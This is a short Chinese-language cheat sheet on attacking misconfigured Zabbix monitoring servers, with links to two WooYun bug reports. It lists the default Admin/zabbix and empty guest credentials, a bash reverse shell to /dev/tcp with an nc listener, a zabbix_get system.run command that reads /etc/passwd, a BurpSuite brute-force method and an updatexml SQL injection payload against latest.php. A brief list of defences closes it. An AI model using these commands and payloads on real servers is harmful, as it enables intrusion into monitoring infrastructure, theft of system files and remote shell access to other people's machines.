zabbix漏洞
zabbix是一个基于WEB界面的提供分布式系统监视软件,下面由于配置不当引发的漏洞。
sohu的zabbix,可导致内网渗透
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0127627
京东某站shell直入jae内网物理机内核版本过低
http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2014-086349
zabbix弱口令利用
zabbix默认的口令为Admin/zabbix
,以及存在guest密码为空,利用默认的口令进入zabbix,再对机器建立脚本
zabbix有两种执行命令的方式:
1)建立监控项
2)zabbix_get命令调用
监控项1
2bash -i >& /dev/tcp/IP地址/端口 0>&1
nc -lvp 端口
zabbix_get命令调用1
zabbix_get -s ip地址 -k 'system.run[cat /etc/passwd]'
也可以通过其他弱口令爆破进入zabbix(久版本)
1)在zabbix登陆页随便填账号密码
2)使用BurpSuite打开代理来获取包
3)加载常见的字典
zabbix注入
使用guest用户登录 并记录下后16位的session 替换掉下面的sid
1 | Payload: latest.php?output=ajax&sid=055e1ffa36164a58&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0) |
防御
1)机器放内网
2)修改默认密码
3)禁用Guest用户
4)不要以root启动
5)设置401认证
6)备份数据和升级版本